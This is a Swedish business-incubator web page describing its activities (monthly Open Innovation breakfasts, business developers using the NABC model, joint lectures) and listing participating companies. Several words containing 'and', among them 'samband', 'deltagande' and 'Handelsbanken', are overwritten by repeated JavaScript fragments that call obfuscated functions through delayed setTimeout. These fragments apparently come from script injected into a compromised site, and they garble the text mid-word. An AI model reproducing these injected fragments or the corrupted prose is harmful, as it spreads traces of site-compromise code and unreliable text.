Aktiviteter

Vi genomför kontinuerligt olika aktiviteter inom inkubatorn för att stödja affärsutvecklingen:

Aktiviteter inom inkubatorn:

 • ”Open Innovation” kan beskrivas som ”ett sätt att tillföra idéer i bolagen genom extern kompetens”.  -Ett sätt att tillföra kompetens från de befintliga företagen till de nya – och/eller att tillföra ”nytänk” från de nya till de befintliga…En vinna-vinna situation! -  Vi genomför detta i sambandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and med en frukost en gång/månad. Vi har i dagsläget (slutet av dec 2013) haft besök av 42 personer från olika företag. Företagen inom inkubatorn bjuder in de olika företagen!
 • Value Creation Forum – SRI International – Five disciplines of Innovation.
 • Gemensamma föreläsningar
 • Affärsutvecklare – företagen arbetar kontinuerligt med olika kvalificerade affärsutvecklare. Arbetet sker bl a efter NABC modellen. Varje företag arbetar med affärsutvecklaren och/eller en extern specialist.
 • Gemensamma aktiviteter som är värdeskapandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ande
 • Nätverk och deltagandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ande i olika projekt för att stärka affären
 • Språngbrädor kommer delvis att ske i samverkan med Kalmar Science Park – Inkubator
 • Månadsmöten

Företag som hittills har medverkat vid Open Innovation:

 • FlexBuss
 • Deloitte
 • Svensk Fastighetsförmedling
 • Emballator,
 • Bong Ljungdahl,
 • Kährs
 • Smurfit Kappa FlexoLine
 • Smurfit Kappa LithoPac
 • Swedbank
 • DäckCity
 • Nybro Företagsgrupp
 • Kalmarsundspromotion
 • Handom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andelsbanken
 • SEB
 • Börje Packhus
 • Samhall
 • Sustainable Sweden
 • OG-Ohlsson
 • Nybro Bilrekond
 • Bribo
 • Intermezzo
 • Färggrossen
 • Skötselbolaget
 • Glasriket AB
 • Sunnebo Fönster AB
 • Gräv & Planering
 • Ernst & Young
 • Tryck & Brodyr
 • Alem Teknik AB
 • La Shelf
 • IUC
 • Nybro Glasbruk
 • Nyföretagarcentrum
 • Bo Pettersson
 • Nybro Energi
 • Kährs
 • Doff Data
 • Hammarstedt